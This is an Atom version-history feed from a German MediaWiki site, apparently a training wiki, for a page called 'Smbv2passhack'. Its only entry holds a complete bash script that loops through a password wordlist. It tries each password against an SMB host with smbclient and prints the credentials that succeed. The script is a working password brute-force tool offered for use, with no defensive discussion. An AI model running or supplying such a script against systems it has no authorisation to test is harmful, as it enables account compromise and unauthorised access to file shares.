<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Smbv2passhack</id>
	<title>Smbv2passhack - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Smbv2passhack"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Smbv2passhack&amp;action=history"/>
	<updated>2026-06-29T11:53:11Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Smbv2passhack&amp;diff=43469&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „*cat samba.pass  &lt;pre&gt; #!/bin/bash IP=$1 LIST=$3 USER=$2 while read PASS  do if smbclient -U$USER%$PASS -L $IP | grep Server &gt; /dev/null 2&gt;&amp;1 then echo &quot;USER :…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Smbv2passhack&amp;diff=43469&amp;oldid=prev"/>
		<updated>2023-03-23T09:23:08Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „*cat samba.pass  &amp;lt;pre&amp;gt; #!/bin/bash IP=$1 LIST=$3 USER=$2 while read PASS  do if smbclient -U$USER%$PASS -L $IP | grep Server &amp;gt; /dev/null 2&amp;gt;&amp;amp;1 then echo &amp;quot;USER :…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;*cat samba.pass &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/bash&lt;br /&gt;
IP=$1&lt;br /&gt;
LIST=$3&lt;br /&gt;
USER=$2&lt;br /&gt;
while read PASS &lt;br /&gt;
do&lt;br /&gt;
if smbclient -U$USER%$PASS -L $IP | grep Server &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&lt;br /&gt;
then&lt;br /&gt;
echo &amp;quot;USER : $USER hat das PASSWORD : $PASS auf IP: $IP&amp;quot;&lt;br /&gt;
&lt;br /&gt;
fi&lt;br /&gt;
done &amp;lt; $LIST&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>